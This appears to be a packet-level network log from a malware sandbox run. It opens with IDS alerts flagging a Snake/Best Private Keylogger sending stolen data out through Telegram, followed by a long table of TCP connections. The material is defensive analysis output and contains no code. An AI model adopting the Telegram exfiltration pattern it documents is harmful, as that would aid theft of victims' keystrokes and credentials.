                                                                                                        2025-01-11T07:20:37.707556+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949721149.154.167.220443TCP
                                                                                                        2025-01-11T07:20:37.992261+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949721149.154.167.220443TCP
                                                                                                        2025-01-11T07:20:39.294053+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949723149.154.167.220443TCP
                                                                                                        2025-01-11T07:20:39.600046+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949723149.154.167.220443TCP
                                                                                                        2025-01-11T07:20:40.942200+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949725149.154.167.220443TCP
                                                                                                        2025-01-11T07:20:41.250577+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949725149.154.167.220443TCP
                                                                                                        2025-01-11T07:20:45.052385+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949727149.154.167.220443TCP
                                                                                                        2025-01-11T07:20:45.361029+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949727149.154.167.220443TCP
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 11, 2025 07:20:00.644867897 CET49709443192.168.2.9142.250.185.142
                                                                                                        Jan 11, 2025 07:20:00.644916058 CET44349709142.250.185.142192.168.2.9
                                                                                                        Jan 11, 2025 07:20:00.645010948 CET49709443192.168.2.9142.250.185.142
                                                                                                        Jan 11, 2025 07:20:00.664413929 CET49709443192.168.2.9142.250.185.142
                                                                                                        Jan 11, 2025 07:20:00.664437056 CET44349709142.250.185.142192.168.2.9
                                                                                                        Jan 11, 2025 07:20:01.321892023 CET44349709142.250.185.142192.168.2.9
                                                                                                        Jan 11, 2025 07:20:01.322035074 CET49709443192.168.2.9142.250.185.142
                                                                                                        Jan 11, 2025 07:20:01.322660923 CET44349709142.250.185.142192.168.2.9
                                                                                                        Jan 11, 2025 07:20:01.322725058 CET49709443192.168.2.9142.250.185.142
                                                                                                        Jan 11, 2025 07:20:01.386884928 CET49709443192.168.2.9142.250.185.142
                                                                                                        Jan 11, 2025 07:20:01.386909008 CET44349709142.250.185.142192.168.2.9
                                                                                                        Jan 11, 2025 07:20:01.387278080 CET44349709142.250.185.142192.168.2.9
                                                                                                        Jan 11, 2025 07:20:01.387341022 CET49709443192.168.2.9142.250.185.142
                                                                                                        Jan 11, 2025 07:20:01.391113997 CET49709443192.168.2.9142.250.185.142
                                                                                                        Jan 11, 2025 07:20:01.431333065 CET44349709142.250.185.142192.168.2.9
                                                                                                        Jan 11, 2025 07:20:01.715389967 CET44349709142.250.185.142192.168.2.9
                                                                                                        Jan 11, 2025 07:20:01.715508938 CET49709443192.168.2.9142.250.185.142
                                                                                                        Jan 11, 2025 07:20:01.715658903 CET49709443192.168.2.9142.250.185.142
                                                                                                        Jan 11, 2025 07:20:01.715708017 CET44349709142.250.185.142192.168.2.9
                                                                                                        Jan 11, 2025 07:20:01.715760946 CET49709443192.168.2.9142.250.185.142
                                                                                                        Jan 11, 2025 07:20:01.740014076 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:01.740055084 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:01.740115881 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:01.740406036 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:01.740420103 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:02.374368906 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:02.374481916 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:02.385899067 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:02.385927916 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:02.386238098 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:02.386339903 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:02.387334108 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:02.431325912 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.607770920 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.607928038 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.613617897 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.613706112 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.626230955 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.626329899 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.626343012 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.626539946 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.632528067 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.632603884 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.694413900 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.694500923 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.694585085 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.694586039 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.694602013 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.694649935 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.697164059 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.697227955 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.697236061 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.697278976 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.703329086 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.703542948 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.703551054 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.703598976 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.709570885 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.709630013 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.709711075 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.709759951 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.715919971 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.716010094 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.716017962 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.716064930 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.722275019 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.722362995 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.722372055 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.722414970 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.728450060 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.728522062 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.728529930 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.728569984 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.734776020 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.734843969 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.734852076 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.735013008 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.740592003 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.740660906 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.740670919 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.740711927 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.746479034 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.746560097 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.746568918 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.746607065 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.752114058 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.752227068 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.752235889 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.752289057 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.758049965 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.758099079 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.761949062 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.762067080 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.763751984 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.763803005 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.781028032 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.781084061 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.781090021 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.781100988 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.781121969 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.781152964 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.781162024 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.781202078 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.781333923 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.781383038 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.783286095 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.783339024 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.783919096 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.784068108 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.789113998 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.789154053 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.789180994 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.789191961 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.789205074 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.789371967 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.794557095 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.794620991 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.794630051 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.794675112 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.800002098 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.800055027 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.800111055 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.800153017 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.805072069 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.805121899 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.805129051 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.805170059 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.809919119 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.809971094 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.810090065 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.810136080 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.814766884 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.814810038 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.814815998 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.815337896 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.819322109 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.819379091 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.819386959 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.819432974 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.823985100 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.824033022 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.824040890 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.824119091 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.828610897 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.828661919 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.828676939 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.828722000 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.833250046 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.833311081 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.833326101 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.833360910 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.837876081 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.837984085 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.837995052 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.838041067 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.842390060 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.842437983 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.842446089 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.842556000 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.846592903 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.846641064 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.846647024 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.846690893 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.846695900 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.846740007 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.846745014 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.846776009 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:04.846785069 CET44349710216.58.206.65192.168.2.9
                                                                                                        Jan 11, 2025 07:20:04.846797943 CET49710443192.168.2.9216.58.206.65
                                                                                                        Jan 11, 2025 07:20:05.215642929 CET4971180192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:05.220483065 CET8049711132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:05.220668077 CET4971180192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:05.220906019 CET4971180192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:05.226366043 CET8049711132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:13.844959021 CET8049711132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:13.853431940 CET4971180192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:13.858185053 CET8049711132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:15.587677002 CET8049711132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:15.627680063 CET4971180192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:15.867816925 CET49712443192.168.2.9104.21.32.1
                                                                                                        Jan 11, 2025 07:20:15.867852926 CET44349712104.21.32.1192.168.2.9
                                                                                                        Jan 11, 2025 07:20:15.867933989 CET49712443192.168.2.9104.21.32.1
                                                                                                        Jan 11, 2025 07:20:15.870136023 CET49712443192.168.2.9104.21.32.1
                                                                                                        Jan 11, 2025 07:20:15.870145082 CET44349712104.21.32.1192.168.2.9
                                                                                                        Jan 11, 2025 07:20:16.338881969 CET44349712104.21.32.1192.168.2.9
                                                                                                        Jan 11, 2025 07:20:16.339071989 CET49712443192.168.2.9104.21.32.1
                                                                                                        Jan 11, 2025 07:20:16.354717970 CET49712443192.168.2.9104.21.32.1
                                                                                                        Jan 11, 2025 07:20:16.354739904 CET44349712104.21.32.1192.168.2.9
                                                                                                        Jan 11, 2025 07:20:16.355103970 CET44349712104.21.32.1192.168.2.9
                                                                                                        Jan 11, 2025 07:20:16.361531973 CET49712443192.168.2.9104.21.32.1
                                                                                                        Jan 11, 2025 07:20:16.403327942 CET44349712104.21.32.1192.168.2.9
                                                                                                        Jan 11, 2025 07:20:16.485600948 CET44349712104.21.32.1192.168.2.9
                                                                                                        Jan 11, 2025 07:20:16.485662937 CET44349712104.21.32.1192.168.2.9
                                                                                                        Jan 11, 2025 07:20:16.485873938 CET49712443192.168.2.9104.21.32.1
                                                                                                        Jan 11, 2025 07:20:16.494637012 CET49712443192.168.2.9104.21.32.1
                                                                                                        Jan 11, 2025 07:20:21.929239988 CET4971180192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:21.934555054 CET8049711132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:25.141398907 CET8049711132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:25.191375971 CET4971180192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:25.479232073 CET4971180192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:25.484153032 CET8049711132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:27.692233086 CET8049711132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:27.707034111 CET49713443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:27.707091093 CET44349713149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:27.707187891 CET49713443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:27.707942009 CET49713443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:27.707961082 CET44349713149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:27.737417936 CET4971180192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:28.346062899 CET44349713149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:28.346221924 CET49713443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:28.349812984 CET49713443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:28.349832058 CET44349713149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:28.350255013 CET44349713149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:28.351695061 CET49713443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:28.395332098 CET44349713149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:28.407731056 CET49713443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:28.407741070 CET44349713149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:28.673314095 CET44349713149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:28.673391104 CET44349713149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:28.673430920 CET49713443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:28.682600975 CET49713443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:28.693171024 CET4971180192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:28.694212914 CET4971480192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:28.698251963 CET8049711132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:28.698340893 CET4971180192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:28.698987007 CET8049714132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:28.699173927 CET4971480192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:28.699321032 CET4971480192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:28.704082966 CET8049714132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:31.370702028 CET8049714132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:31.386373997 CET49715443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:31.386440039 CET44349715149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:31.386534929 CET49715443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:31.386796951 CET49715443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:31.386816978 CET44349715149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:31.424576044 CET4971480192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:32.007700920 CET44349715149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:32.009510994 CET49715443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:32.009543896 CET44349715149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:32.009614944 CET49715443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:32.009625912 CET44349715149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:32.352765083 CET44349715149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:32.352852106 CET44349715149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:32.352933884 CET49715443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:32.353368998 CET49715443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:32.356585979 CET4971480192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:32.357898951 CET4971680192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:32.361607075 CET8049714132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:32.361685991 CET4971480192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:32.362776041 CET8049716132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:32.362852097 CET4971680192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:32.362955093 CET4971680192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:32.367775917 CET8049716132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:33.056241989 CET8049716132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:33.057487965 CET49717443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:33.057537079 CET44349717149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:33.057607889 CET49717443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:33.057874918 CET49717443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:33.057888031 CET44349717149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:33.112153053 CET4971680192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:33.685622931 CET44349717149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:33.687922955 CET49717443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:33.687952995 CET44349717149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:33.688028097 CET49717443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:33.688035965 CET44349717149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:33.907857895 CET44349717149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:33.907938957 CET44349717149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:33.907994032 CET49717443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:33.908468008 CET49717443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:33.912863016 CET4971880192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:33.917700052 CET8049718132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:33.917819023 CET4971880192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:33.917927027 CET4971880192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:33.922905922 CET8049718132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:35.587040901 CET8049718132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:35.588376999 CET49719443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:35.588423014 CET44349719149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:35.588511944 CET49719443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:35.588803053 CET49719443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:35.588814020 CET44349719149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:35.627773046 CET4971880192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:36.192302942 CET44349719149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:36.194046974 CET49719443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:36.194078922 CET44349719149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:36.194137096 CET49719443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:36.194142103 CET44349719149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:36.397563934 CET44349719149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:36.397645950 CET44349719149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:36.397716045 CET49719443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:36.398158073 CET49719443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:36.401041031 CET4971880192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:36.402170897 CET4972080192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:36.406038046 CET8049718132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:36.406116962 CET4971880192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:36.407046080 CET8049720132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:36.407200098 CET4972080192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:36.407249928 CET4972080192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:36.412075996 CET8049720132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:37.080285072 CET8049720132.226.247.73192.168.2.9
                                                                                                        Jan 11, 2025 07:20:37.081442118 CET49721443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:37.081475019 CET44349721149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:37.081537008 CET49721443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:37.081788063 CET49721443192.168.2.9149.154.167.220
                                                                                                        Jan 11, 2025 07:20:37.081804037 CET44349721149.154.167.220192.168.2.9
                                                                                                        Jan 11, 2025 07:20:37.127763033 CET4972080192.168.2.9132.226.247.73
                                                                                                        Jan 11, 2025 07:20:37.705590010 CET44349721149.154.167.220192.168.2.9
